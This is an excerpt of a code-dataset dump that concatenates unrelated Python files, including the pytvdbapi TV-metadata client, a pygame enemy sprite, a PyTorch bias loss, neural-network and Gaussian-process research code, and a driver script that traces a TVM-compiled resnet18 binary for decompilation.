error.TVDBValueError(u\"Index should be an integer or slice\")\n\n def __str__(self):\n return u'<{0} - {1}>'.format(self.__class__.__name__, self.SeriesName)\n\n def __repr__(self):\n return self.__str__()\n\n def update(self):\n \"\"\"\n Updates the data structure with data from the server.\n \"\"\"\n self._populate_data()\n\n def _populate_data(self):\n \"\"\"\n Populates the Show object with data. 
This will hit the network to\n        download the XML data from `thetvdb.com <http://thetvdb.com>`_.\n        :class:`Season` and :class:`Episode` objects will be created and\n        added as needed.\n\n        .. Note: This function is not intended to be used by clients of the\n            API and should only be used internally by the Show class to manage its\n            structure.\n        \"\"\"\n        logger.debug(u\"Populating season data from URL.\")\n\n        context = {'mirror': self.api.mirrors.get_mirror(TypeMask.XML).url,\n                   'api_key': self.config['api_key'],\n                   'seriesid': self.id,\n                   'language': self.lang}\n\n        url = __series__.format(**context)\n        data = generate_tree(self.api.loader.load(url))\n        episodes = [d for d in parse_xml(data, \"Episode\")]\n\n        show_data = parse_xml(data, \"Series\")\n        assert len(show_data) == 1, u\"Should only have 1 Show section\"\n\n        self.data = merge(self.data, InsensitiveDictionary(show_data[0], ignore_case=self.ignore_case))\n\n        for episode_data in episodes:\n            season_nr = int(episode_data['SeasonNumber'])\n            if not season_nr in self.seasons:\n                self.seasons[season_nr] = Season(season_nr, self)\n\n            episode = Episode(episode_data, self.seasons[season_nr], self.config)\n            self.seasons[season_nr].append(episode)\n\n        #If requested, load the extra actors data\n        if self.config.get('actors', False):\n            self.load_actors()\n\n        #if requested, load the extra banners data\n        if self.config.get('banners', False):\n            self.load_banners()\n\n    def load_actors(self):\n        \"\"\"\n        .. versionadded:: 0.4\n\n        Loads the extended actor information into a list of :class:`pytvdbapi.actor.Actor` objects.\n        They are available through the *actor_objects* attribute of the show.\n\n        If you have used the `actors=True` keyword when creating the :class:`TVDB` instance\n        the actors will be loaded automatically and there is no need to use this\n        function.\n\n        .. note::\n            The :class:`Show` instance always contain a list of actor names. If\n            that is all you need, do not use this function to avoid unnecessary\n            network traffic.\n\n        .. seealso::\n            :class:`TVDB` for information on how to use the *actors* keyword\n            argument.\n        \"\"\"\n        context = {'mirror': self.api.mirrors.get_mirror(TypeMask.XML).url,\n                   'api_key': self.config['api_key'],\n                   'seriesid': self.id}\n        url = __actors__.format(**context)\n\n        logger.debug(u'Loading Actors data from {0}'.format(url))\n\n        data = generate_tree(self.api.loader.load(url))\n\n        mirror = self.api.mirrors.get_mirror(TypeMask.BANNER).url\n\n        #generate all the Actor objects\n        # pylint: disable=W0201\n        self.actor_objects = [Actor(mirror, d, self)\n                              for d in parse_xml(data, 'Actor')]\n\n    def load_banners(self):\n        \"\"\"\n        .. versionadded:: 0.4\n\n        Loads the extended banner information into a list of :class:`pytvdbapi.banner.Banner` objects.\n        They are available through the *banner_objects* attribute of the show.\n\n        If you have used the `banners=True` keyword when creating the :class:`TVDB` instance the\n        banners will be loaded automatically and there is no need to use this\n        function.\n\n        .. 
seealso::\n            :class:`TVDB` for information on how to use the *banners* keyword\n            argument.\n        \"\"\"\n        context = {'mirror': self.api.mirrors.get_mirror(TypeMask.XML).url,\n                   'api_key': self.config['api_key'],\n                   'seriesid': self.id}\n\n        url = __banners__.format(**context)\n        logger.debug(u'Loading Banner data from {0}'.format(url))\n\n        data = generate_tree(self.api.loader.load(url))\n        mirror = self.api.mirrors.get_mirror(TypeMask.BANNER).url\n\n        # pylint: disable=W0201\n        self.banner_objects = [Banner(mirror, b, self) for b in parse_xml(data, \"Banner\")]\n\n\nclass Search(object):\n    # pylint: disable=R0924\n    \"\"\"\n    :raise: :exc:`pytvdbapi.error.TVDBIndexError`\n\n    A search result returned from calling :func:`TVDB.search()`. It supports\n    iterating over the results, and the individual shows matching the search\n    can be accessed using the [ ] syntax.\n\n    The search will contain 0 or more :class:`Show()` instances matching the\n    search.\n\n    The shows will be stored in the same order as they are returned from\n    `thetvdb.com <http://thetvdb.com>`_. They state that if there is a\n    perfect match to the search, it will be the first element returned.\n\n    .. seealso:: :func:`TVDB.search` for an example of how to use the search\n    \"\"\"\n\n    def __init__(self, result, search, language):\n        self._result = result\n\n        #: The search term used to generate the search result\n        self.search = search\n\n        #: The language used to perform the search\n        self.language = language\n\n    def __len__(self):\n        return len(self._result)\n\n    def __getitem__(self, item):\n        if not isinstance(item, int):\n            raise error.TVDBValueError(u\"Index should be an integer\")\n\n        try:\n            return self._result[item]\n        except (IndexError, TypeError):\n            raise error.TVDBIndexError(u\"Index out of range ({0})\".format(item))\n\n    def __iter__(self):\n        return iter(self._result)\n\n\nclass TVDB(object):\n    \"\"\"\n    :param api_key: The API key to use to communicate with the server\n    :param kwargs:\n\n    This is the main entry point for the API. The functionality of the API is\n    controlled by configuring the keyword arguments. The supported keyword\n    arguments are:\n\n    * **cache_dir** (default=/<system temp dir>/pytvdbapi/). Specifies the\n        directory to use for caching the server requests.\n\n    .. versionadded:: 0.3\n\n    * **actors** (default=False) The extended actor information is stored in a\n        separate XML file and would require an additional request to the server\n        to obtain. To limit the resource usage, the actor information will only\n        be loaded when explicitly requested.\n\n        .. note:: The :class:`Show()` object always contain a list of actor\n            names.\n\n    * **banners** (default=False) The extended banner information is stored in a\n        separate XML file and would require an additional request to the server\n        to obtain. To limit the resource usage, the banner information will only\n        be loaded when explicitly requested.\n\n    .. versionadded:: 0.4\n\n    * **ignore_case** (default=False) If set to True, all attributes on the\n        :class:`Show` and :class:`Episode` instances will be accessible in a\n        case insensitive manner. If set to False, the default, all\n        attributes will be case sensitive and retain the same casing\n        as provided by `thetvdb.com <http://thetvdb.com>`_.\n\n    .. deprecated:: 0.4\n\n    * **force_lang** (default=False). It is no longer possible to reload the\n        language file. 
Using it will have no effect but will issue a warning in\n        the log file.\n    \"\"\"\n\n    @unicode_arguments\n    def __init__(self, api_key, **kwargs):\n        self.config = dict()\n\n        #cache old searches to avoid hitting the server\n        self.search_buffer = dict()\n\n        #Store the path to where we are\n        self.path = os.path.abspath(os.path.dirname(__file__))\n\n        if 'force_lang' in kwargs:\n            logger.warning(u\"'force_lang' keyword argument is deprecated as of version 0.4\")\n\n        #extract all argument and store for later use\n        self.config['api_key'] = api_key\n        self.config['cache_dir'] = kwargs.get(\"cache_dir\",\n                                              make_unicode(os.path.join(tempfile.gettempdir(), __NAME__)))\n\n        self.config['actors'] = kwargs.get('actors', False)\n        self.config['banners'] = kwargs.get('banners', False)\n        self.config['ignore_case'] = kwargs.get('ignore_case', False)\n\n        #Create the loader object to use\n        self.loader = Loader(self.config['cache_dir'])\n\n        #Create the list of available mirrors\n        tree = generate_tree(self.loader.load(__mirrors__.format(**self.config)))\n        self.mirrors = MirrorList(tree)\n\n    @unicode_arguments\n    def search(self, show, language, cache=True):\n        \"\"\"\n        :param show: The show name to search for\n        :param language: The language abbreviation to search for. E.g. \"en\"\n        :param cache: If False, the local cache will not be used and the\n            resources will be reloaded from server.\n        :return: A :class:`Search()` instance\n        :raise: :exc:`pytvdbapi.error.TVDBValueError`\n\n        Searches the server for a show with the provided show name in the\n        provided language. The language should be one of the supported\n        language abbreviations or it could be set to *all* to search all\n        languages. It will raise :class:`pytvdbapi.error.TVDBValueError` if\n        an invalid language is provided.\n\n        Searches are always cached within a session to make subsequent\n        searches with the same parameters fast. If *cache*\n        is set to True searches will also be cached across sessions,\n        this is recommended to increase speed and to reduce the workload of\n        the servers.\n\n        Example::\n\n            >>> from pytvdbapi import api\n            >>> db = api.TVDB(\"B43FF87DE395DF56\")\n            >>> result = db.search(\"House\", \"en\")\n\n            >>> print(result[0])\n            <Show - House>\n\n            >>> for show in result:\n            ...     print(show) # doctest: +ELLIPSIS\n            <Show - House>\n            ...\n            <Show - ...>\n            ...\n        \"\"\"\n\n        logger.debug(u\"Searching for {0} using language {1}\".format(show, language))\n\n        if language != u'all' and language not in __LANGUAGES__:\n            raise error.TVDBValueError(u\"{0} is not a valid language\".format(language))\n\n        if (show, language) not in self.search_buffer or not cache:\n            context = {'series': quote(make_bytes(show)), \"language\": language}\n            data = generate_tree(self.loader.load(__search__.format(**context), cache))\n            shows = [Show(d, self, language, self.config) for d in parse_xml(data, \"Series\")]\n\n            self.search_buffer[(show, language)] = shows\n\n        return Search(self.search_buffer[(show, language)], show, language)\n\n    @unicode_arguments\n    def get(self, series_id, language, cache=True):\n        \"\"\"\n        .. versionadded:: 0.3\n        .. deprecated:: 0.4 Use :func:`get_series` instead.\n\n        :param series_id: The Show Id to fetch\n        :param language: The language abbreviation to search for. E.g. \"en\"\n        :param cache: If False, the local cache will not be used and the\n            resources will be reloaded from server.\n\n        :return: A :class:`Show()` instance\n        :raise: :exc:`pytvdbapi.error.TVDBValueError`, :exc:`pytvdbapi.error.TVDBIdError`\n        \"\"\"\n\n        logger.warning(u\"Using deprecated function 'get'. 
Use 'get_series' instead\")\n return self.get_series(series_id, language, cache)\n\n @unicode_arguments\n def get_series(self, series_id, language, cache=True):\n \"\"\"\n .. versionadded:: 0.4\n\n :param series_id: The Show Id to fetch\n :param language: The language abbreviation to search for. E.g. \"en\"\n :param cache: If False, the local cache will not be used and the\n resources will be reloaded from server.\n\n :return: A :class:`Show()` instance\n :raise: :exc:`pytvdbapi.error.TVDBValueError`, :exc:`pytvdbapi.error.TVDBIdError`\n\n Provided a valid Show ID, the data for the show is fetched and a\n corresponding :class:`Show()` object is returned.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> show = db.get_series( 79349, \"en\" ) # Load Dexter\n >>> print(show.SeriesName)\n Dexter\n \"\"\"\n\n logger.debug(u\"Getting series with id {0} with language {1}\".format(series_id, language))\n\n if language != 'all' and language not in __LANGUAGES__:\n raise error.TVDBValueError(u\"{0} is not a valid language\".format(language))\n\n context = {'seriesid': series_id, \"language\": language,\n 'mirror': self.mirrors.get_mirror(TypeMask.XML).url,\n 'api_key': self.config['api_key']}\n\n url = __series__.format(**context)\n logger.debug(u'Getting series from {0}'.format(url))\n\n try:\n data = self.loader.load(url, cache)\n except error.TVDBNotFoundError:\n raise error.TVDBIdError(u\"Series id {0} not found\".format(series_id))\n\n if data.strip():\n data = generate_tree(data)\n else:\n raise error.BadData(\"Bad data received\")\n\n series = parse_xml(data, \"Series\")\n\n if len(series) == 0:\n raise error.BadData(\"Bad data received\")\n else:\n return Show(series[0], self, language, self.config)\n\n @unicode_arguments\n def get_episode(self, episode_id, language, cache=True):\n \"\"\"\n .. versionadded:: 0.4\n\n :param episode_id: The Episode Id to fetch\n :param language: The language abbreviation to search for. E.g. \"en\"\n :param cache: If False, the local cache will not be used and the\n resources will be reloaded from server.\n\n :return: An :class:`Episode()` instance\n :raise: :exc:`pytvdbapi.error.TVDBIdError` if no episode is found with the given Id\n\n\n Given a valid episode Id the corresponding episode data is fetched and\n the :class:`Episode()` instance is returned.\n\n Example::\n\n >>> from pytvdbapi import api\n >>> db = api.TVDB(\"B43FF87DE395DF56\")\n >>> episode = db.get_episode(308834, \"en\") # Load an episode of dexter\n >>> print(episode.id)\n 308834\n\n >>> print(episode.EpisodeName)\n Crocodile\n\n .. 
Note:: When the :class:`Episode()` is loaded using :func:`get_episode()`\n the *season* attribute used to link the episode with a season will be None.\n \"\"\"\n\n logger.debug(u\"Getting episode with id {0} with language {1}\".format(episode_id, language))\n\n if language != 'all' and language not in __LANGUAGES__:\n raise error.TVDBValueError(u\"{0} is not a valid language\".format(language))\n\n context = {'episodeid': episode_id, \"language\": language,\n 'mirror': self.mirrors.get_mirror(TypeMask.XML).url,\n 'api_key': self.config['api_key']}\n\n url = __episode__.format(**context)\n logger.debug(u'Getting episode from {0}'.format(url))\n\n try:\n data = self.loader.load(url, cache)\n except error.TVDBNotFoundError:\n raise error.TVDBIdError(u\"No Episode with id {0} found\".format(episode_id))\n\n if data.strip():\n data = generate_tree(data)\n else:\n raise error.BadData(\"Bad data received\")\n\n episodes = parse_xml(data, \"Episode\")\n\n if len(episodes) == 0:\n raise error.BadData(\"Bad data received\")\n else:\n return Episode(episodes[0], None, self.config)\n","sub_path":"Contents/Libraries/Shared/pytvdbapi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":32598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"366946798","text":"import time\nfrom random import choice\n\nimport pygame\n\n\nclass Enemy:\n animation_enemy = ['./img/enemy/first_enemy/enemy_start.png',\n './img/enemy/first_enemy/enemy_stand.png',\n './img/enemy/first_enemy/enemy_move.png']\n\n image = pygame.image.load(animation_enemy[0])\n type = 'Enemy'\n\n def __init__(self, x=100, y=125):\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.speed = 0\n self.direction = None\n self.can_move_Right = True\n self.can_move_Left = True\n self.can_move_Up = True\n self.can_move_Down = True\n self.directions = ['Up', 'Left', 'Right', 'Down']\n self.choose_direction()\n # for animation\n self.start_anim_time = None\n self.num_sprite = 0\n\n def choose_direction(self):\n data = []\n if self.can_move_Left:\n data.append('Left')\n if self.can_move_Right:\n data.append('Right')\n if self.can_move_Up:\n data.append('Up')\n if self.can_move_Down:\n data.append('Down')\n if len(data) == 0:\n data = ['Right', 'Left', 'Up', 'Down']\n self.can_move_Right = True\n self.can_move_Left = True\n self.can_move_Up = True\n self.can_move_Down = True\n self.direction = choice(data)\n\n def prepare_for_anim(self):\n if self.start_anim_time is None:\n self.start_anim_time = time.time()\n self.num_sprite = 0\n elif self.start_anim_time is not None:\n if time.time() - self.start_anim_time > 0.3:\n self.start_anim_time = time.time()\n self.num_sprite = (self.num_sprite + 1) % 2\n\n def dancing(self):\n self.prepare_for_anim()\n self.image = pygame.image.load(self.animation_enemy[self.num_sprite])\n\n def process_move(self):\n if not self.can_move_Up and not self.can_move_Right and not self.can_move_Left and not self.can_move_Down:\n return\n if self.direction == 'Right':\n self.rect.move_ip(self.speed, 0)\n if self.direction == 'Left':\n self.rect.move_ip(-self.speed, 0)\n if self.direction == 'Up':\n self.rect.move_ip(0, -self.speed)\n if self.direction == 'Down':\n self.rect.move_ip(0, self.speed)\n\n def process_logic(self, objects):\n while self.process_collision(objects):\n self.choose_direction()\n self.process_move()\n self.dancing()\n\n def process_draw(self, screen, camera):\n screen.blit(self.image, camera.apply(self))\n\n def 
detect_collision_right(self, object):\n if self.direction == 'Right' and object.type != 'Grass' and object.type != 'Fire' and object.rect.colliderect(\n Enemy(self.rect.x + self.speed, self.rect.y)):\n return True\n return False\n\n def detect_collision_left(self, object):\n if self.direction == 'Left' and object.type != 'Grass' and object.type != 'Fire' and object.rect.colliderect(\n Enemy(self.rect.x - self.speed, self.rect.y)):\n return True\n return False\n\n def detect_collision_down(self, object):\n if self.direction == 'Down' and object.type != 'Grass' and object.type != 'Fire' and object.rect.colliderect(\n Enemy(self.rect.x, self.rect.y + self.speed)):\n return True\n return False\n\n def detect_collision_up(self, object):\n if self.direction == 'Up' and object.type != 'Grass' and object.type != 'Fire' and object.rect.colliderect(\n Enemy(self.rect.x, self.rect.y - self.speed)):\n return True\n return False\n\n def process_collision(self, objects):\n for object in objects:\n if self.detect_collision_down(object):\n self.can_move_Down = False\n return True\n if self.detect_collision_up(object):\n self.can_move_Up = False\n return True\n if self.detect_collision_right(object):\n self.can_move_Right = False\n return True\n if self.detect_collision_left(object):\n self.can_move_Left = False\n return True\n return False\n","sub_path":"src/charachters/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"482222038","text":"from torch import nn\nimport torch\n\nGLOBAL_MIN = 100000\n\n\nclass BiasLoss(nn.Module):\n def __init__(self, alpha=0.3, beta=0.3):\n super(BiasLoss, self).__init__()\n self.alpha = alpha\n self.beta = beta\n self.ce = nn.CrossEntropyLoss(reduction='none')\n\n\n def normalise(self, tensor):\n min = tensor.clone().min()\n\n max = tensor.clone().max()\n global GLOBAL_MIN\n if min < GLOBAL_MIN:\n GLOBAL_MIN = min\n normalised = ((tensor - GLOBAL_MIN) / (max - min))\n return normalised\n\n def forward(self, features, output, target):\n features_copy = features.clone().detach()\n features_per_sample = features_copy.reshape(features_copy.shape[0], -1)\n\n variance_per_sample = (torch.var(features_per_sample, dim=1))\n variance_per_sample_normalised = self.normalise(variance_per_sample)\n\n weights = ((torch.exp(variance_per_sample_normalised * self.beta) - 1.) / 1.) 
+ self.alpha\n        loss = weights * self.ce(output, target)\n        loss = loss.mean()\n\n        return loss\n\n","sub_path":"bias_loss/biasloss.py","file_name":"biasloss.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"390008962","text":"__author__ = 'Christin'\r\n\r\n\r\ndef set_bit(v, index):\r\n    return (v|(1<<index))\n\n    def reluDerivative(self, x):\n        if (x > 0):\n            return 1\n        else:\n            return 0\n\n    def testing(self, test):\n        corect = 0\n        for data in test:\n            y1, y2 = self.forward(data)\n            result = 0\n            if y1 >= y2:\n                result = 1\n            else:\n                result = 2\n            if result == data[-1]:\n                corect += 1\n        return corect/len(test)\n\n    def zScoreNormalize(self, dataset):\n        num_data = len(dataset)\n        num_feature = len(dataset[0])-1\n        new_set = np.zeros(dataset.shape)\n        for i in range(num_data):\n            for j in range(num_feature):\n                new_set[i][j] = (dataset[i][j] - self.mean[j]) / self.sd[j]\n            new_set[i][-1] = dataset[i][-1]\n        return new_set\n\nif __name__ == '__main__':\n    accuracy = []\n    np.set_printoptions(precision=3)\n    bp = BackPropagation('iris_data_set/iris.data')\n    for i in range(10):\n        bp.randomSplitData(train_size=0.7)\n        bp.train = bp.zScoreNormalize(bp.train)\n        bp.test = bp.zScoreNormalize(bp.test)\n        errors = bp.training(bp.train, epoche=3500, learning_rate=0.01)\n        accuracy.append(bp.testing(bp.test))\n        print ('Round', i+1,'accuracy:', accuracy[i])\n        plt.plot(errors, label='Round' + str(i+1))\n    print ('Average accuracy:', np.array(accuracy).mean())\n    plt.ylabel('MSE')\n    plt.xlabel('epoche')\n    plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n    plt.show()\n","sub_path":"backpropagation_ReLU.py","file_name":"backpropagation_ReLU.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"26750536","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 21 16:47:00 2020\n\n@author: Katharina Rath\n\"\"\"\n\nimport numpy as np\nfrom scipy.optimize import newton\nfrom scipy.linalg import solve_triangular\nimport scipy\nfrom sklearn.metrics import mean_squared_error \nfrom fortran.sympgpr import sympgpr\nfrom scipy.sparse.linalg import eigsh\nfrom kernels import *\n\ndef f_kern(x, y, x0, y0, l):\n    return kern_num(x,y,x0,y0,l[0], l[1])\n\ndef d2kdxdx0(x, y, x0, y0, l):\n    return d2kdxdx0_num(x,y,x0,y0,l[0], l[1])\n\ndef d2kdydy0(x, y, x0, y0, l):\n    return d2kdydy0_num(x,y,x0,y0,l[0], l[1])\n\ndef d2kdxdy0(x, y, x0, y0, l):\n    return d2kdxdy0_num(x,y,x0,y0,l[0], l[1])\n\ndef d2kdydx0(x, y, x0, y0, l):\n    return d2kdxdy0(x, y, x0, y0, l)\n\ndef build_K(xin, x0in, hyp, K):\n    # set up covariance matrix with derivative observations, Eq. 
(38)\n N = K.shape[0]//2\n N0 = K.shape[1]//2\n x0 = x0in[0:N0]\n x = xin[0:N]\n y0 = x0in[N0:2*N0]\n y = xin[N:2*N]\n sympgpr.build_k(x, y, x0, y0, hyp, K)\n \ndef buildKreg(xin, x0in, hyp, K):\n # set up \"usual\" covariance matrix for GP on regular grid (q,p)\n N = K.shape[0]\n N0 = K.shape[1]\n x0 = x0in[0:N0]\n x = xin[0:N]\n y0 = x0in[N0:2*N0]\n y = xin[N:2*N]\n sympgpr.buildkreg(x, y, x0, y0, hyp, K)\n \ndef build_dKreg(xin, x0in, hyp):\n\n l = hyp[:-1]\n sig = hyp[-1]\n N = len(xin)//2\n N0 = len(x0in)//2\n x0 = x0in[0:N0]\n x = xin[0:N]\n y0 = x0in[N0:2*N0]\n y = xin[N:2*N]\n Kp = np.empty((N, N0))\n \n dK = []\n for k in range(N):\n for lk in range(N0):\n Kp[k,lk] = sig*dkdlx_num(\n x0[lk], y0[lk], x[k], y[k], l[0], l[1]) \n\n dK.append(Kp.copy())\n\n for k in range(N):\n for lk in range(N0):\n Kp[k,lk] = sig*dkdly_num(\n x0[lk], y0[lk], x[k], y[k], l[0], l[1]) \n\n dK.append(Kp.copy())\n return dK\n\ndef build_dK(xin, x0in, hyp):\n # set up covariance matrix\n N = len(xin)//2\n N0 = len(x0in)//2\n l = hyp[:-1]\n sig = hyp[-1]\n x0 = x0in[0:N0]\n x = xin[0:N]\n y0 = x0in[N0:2*N0]\n y = xin[N:2*N]\n k11 = np.empty((N0, N))\n k12 = np.empty((N0, N))\n k21 = np.empty((N0, N))\n k22 = np.empty((N0, N))\n\n dK = []\n \n for k in range(N0):\n for lk in range(N):\n k11[k,lk] = sig*d3kdxdx0dlx_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k21[k,lk] = sig*d3kdxdy0dlx_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k12[k,lk] = sig*d3kdxdy0dlx_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k22[k,lk] = sig*d3kdydy0dlx_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n \n dK.append(np.vstack([\n np.hstack([k11, k12]),\n np.hstack([k21, k22])\n ]))\n\n for k in range(N0):\n for lk in range(N):\n k11[k,lk] = sig*d3kdxdx0dly_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k21[k,lk] = sig*d3kdxdy0dly_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k12[k,lk] = sig*d3kdxdy0dly_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k22[k,lk] = sig*d3kdydy0dly_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n \n dK.append(np.vstack([\n np.hstack([k11, k12]),\n np.hstack([k21, k22])\n ]))\n #dK[:,:] = sig*dK\n return dK\n \n\ndef nll_grad_reg(hyp, x, y, N):\n K = np.empty((N, N), order = 'F')\n buildKreg(x, x, hyp[:-1], K)\n Ky = K + np.abs(hyp[-1])*np.diag(np.ones(N))\n Kyinv = np.linalg.inv(Ky) # invert GP matrix\n alpha = Kyinv.dot(y)\n nlp_val = 0.5*y.T.dot(alpha) + 0.5*np.linalg.slogdet(Ky)[1]\n dK = build_dKreg(x, x, hyp[:-1])\n\n nlp_grad = np.array([\n -0.5*alpha.T.dot(dK[0].dot(alpha)) + 0.5*np.trace(Kyinv.dot(dK[0])),\n -0.5*alpha.T.dot(dK[1].dot(alpha)) + 0.5*np.trace(Kyinv.dot(dK[1]))\n ])\n\n return nlp_val, nlp_grad\n\ndef nll_grad(hyp, x, y, N):\n K = np.empty((N, N), order = 'F')\n build_K(x, x, hyp[:-1], K)\n Ky = K + np.abs(hyp[-1])*np.diag(np.ones(N))\n Kyinv = np.linalg.inv(Ky) # invert GP matrix\n alpha = Kyinv.dot(y)\n nlp_val = 0.5*y.T.dot(alpha) + 0.5*np.linalg.slogdet(Ky)[1]\n dK = build_dK(x, x, hyp[:-1])\n\n nlp_grad = np.array([\n -0.5*alpha.T.dot(dK[0].dot(alpha)) + 0.5*np.trace(Kyinv.dot(dK[0])),\n -0.5*alpha.T.dot(dK[1].dot(alpha)) + 0.5*np.trace(Kyinv.dot(dK[1]))\n ])\n\n return nlp_val, nlp_grad\n\n\ndef gpsolve(Ky, ft):\n L = scipy.linalg.cholesky(Ky, lower = True)\n alpha = solve_triangular(\n L.T, solve_triangular(L, ft, lower=True, check_finite=False), \n lower=False, check_finite=False)\n\n return L, alpha\n\n# compute log-likelihood according to RW, p.19\ndef solve_cholesky(L, b):\n return solve_triangular(\n L.T, solve_triangular(L, b, lower=True, 
check_finite=False), \n lower=False, check_finite=False)\n\n# negative log-posterior\ndef nll_chol_reg(hyp, x, y, N):\n K = np.empty((N, N), order='F')\n buildKreg(x, x, hyp[:-1], K)\n Ky = K + np.abs(hyp[-1])*np.diag(np.ones(N))\n L = scipy.linalg.cholesky(Ky, lower = True)\n alpha = solve_cholesky(L, y)\n ret = 0.5*y.T.dot(alpha) + np.sum(np.log(L.diagonal()))\n return ret\n# negative log-posterior\ndef nll_chol(hyp, x, y, N):\n neig = len(x)\n K = np.empty((N, N), order='F')\n build_K(x, x, hyp[:-1], K)\n Ky = K + np.abs(hyp[-1])*np.diag(np.ones(N))\n try:\n L = scipy.linalg.cholesky(Ky, lower = True, check_finite = False)\n alpha = solve_cholesky(L, y)\n ret = 0.5*y.T.dot(alpha) + np.sum(np.log(L.diagonal()))\n return ret\n except:\n print('Warning! Fallback to eig solver!')\n w, Q = eigsh(Ky, neig, tol=max(1e-6*np.abs(hyp[-1]), 1e-15))\n alpha = Q.dot(np.diag(1.0/w).dot(Q.T.dot(y))) \n ret = 0.5*y.T.dot(alpha) + 0.5*(np.sum(np.log(w)) + (len(x)-neig)*np.log(np.abs(hyp[-1])))\n return ret\n\n\ndef guessP(x, y, hypp, xtrainp, ztrainp, Kyinvp):\n Ntrain = len(xtrainp)//2\n return sympgpr.guessp(\n x, y, hypp, xtrainp[0:Ntrain], xtrainp[Ntrain:], ztrainp, Kyinvp)\n\n\ndef calcQ(x,y, xtrain, l, Kyinv, ztrain):\n Ntrain = len(xtrain)//2\n return sympgpr.calcq(\n x, y, xtrain[:Ntrain], xtrain[Ntrain:], l, Kyinv, ztrain)\n\ndef calcP(x,y, l, hypp, xtrainp, ztrainp, Kyinvp, xtrain, ztrain, Kyinv):\n Ntrain = len(xtrain)//2\n Ntrainp = len(xtrainp)//2\n return sympgpr.calcp(x, y, l, hypp, xtrainp[:Ntrainp], xtrainp[Ntrainp:],\n ztrainp, Kyinvp, xtrain[:Ntrain], xtrain[Ntrain:], ztrain, Kyinv)\n\n\ndef applymap(nm, Ntest, l, hypp, Q0map, P0map, xtrainp, ztrainp, Kyinvp, xtrain, ztrain, Kyinv):\n # Application of symplectic map\n \n pmap = np.zeros([nm, Ntest])\n qmap = np.zeros([nm, Ntest])\n #set initial conditions\n pmap[0,:] = P0map\n qmap[0,:] = Q0map\n \n # loop through all test points and all time steps\n for i in range(0,nm-1):\n for k in range(0, Ntest): \n # set new P including Newton for implicit Eq (42)\n pmap[i+1, k] = calcP(qmap[i,k], pmap[i, k], l, hypp, xtrainp, ztrainp, Kyinvp, xtrain, ztrain, Kyinv)\n for k in range(0, Ntest):\n if np.isnan(pmap[i+1, k]):\n qmap[i+1,k] = np.nan\n else: \n # then: set new Q via calculating \\Delta q and adding q (Eq. (43))\n qmap[i+1, k] = calcQ(qmap[i,k], pmap[i+1,k], xtrain, l, Kyinv, ztrain)\n qmap[i+1, k] = np.mod(qmap[i+1,k] + qmap[i, k], 2.0*np.pi)\n return qmap, pmap\n\ndef quality(qmap, pmap, H, ysint, Ntest):\n #geom. distance\n gd = np.zeros([Ntest]) \n for lk in range(0,Ntest):\n gd[lk] = mean_squared_error(([qmap[1, lk], pmap[1, lk]]),ysint[:, lk, 1])\n stdgd = np.std(gd[:])\n # Energy oscillation\n Eosc = np.zeros([Ntest])\n for lk in range(0, Ntest):\n Eosc[lk] = np.std(H[:,lk])/np.mean(H[:,lk])\n return Eosc, gd, stdgd\n\n\n","sub_path":"python/02_pert_pendulum/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":8009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"325907183","text":"#! 
/usr/bin/python3\nimport copy\nimport os\nimport sys\nsys.path.append(\"../..\")\nimport trace_filter\nimport utils\nimport se_engine\nfrom utils import list_to_json, dict_to_json, json_to_list, json_to_dict\nimport logging\nimport math\nprint('get logger: {}'.format('decompiler.'+__name__))\nlogger = logging.getLogger('decompiler.'+__name__)\n\n\nif __name__ == '__main__':\n utils.funcs_dir = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/resnet18_funcs/\"\n prog_path = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/resnet18_tvm_O3_strip\"\n in_data = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/cat.bin\"\n log_path = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/func_call.log\"\n label_file = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/label.txt\"\n\n if len(sys.argv) == 6:\n utils.funcs_dir = sys.argv[1]\n prog_path = sys.argv[2]\n in_data = sys.argv[3]\n log_path = sys.argv[4]\n label_file = sys.argv[5]\n\n tmp_log_path = './inst_trace.log'\n exp_log_path = './mem_exp.log'\n mem_read_log_path = './mem_read.log'\n mem_write_log_path = './mem_write.log'\n mem_dump_log_path = 'mem_dump.log'\n\n # ==============================================================\n # Step 1 --- Get the Sequence of Layers ---\n # ==============================================================\n # get_funcs_trace(prog_path, in_data, log_path, label_file, only_fused=False)\n \n utils.get_funcs_trace(prog_path, in_data, log_path, label_file, compiler='tvm')\n utils.print_layer_label_tvm(log_path)\n utils.get_funcs_trace(prog_path, in_data, log_path, label_file, compiler='tvm', only_fused=True)\n utils.print_layer_label_tvm(log_path, config_path='config.json', only_fused=True)\n func_meta_data, topo_list = utils.print_input_id(log_path) # to reconstruct the conputational graph\n #exit(0)\n 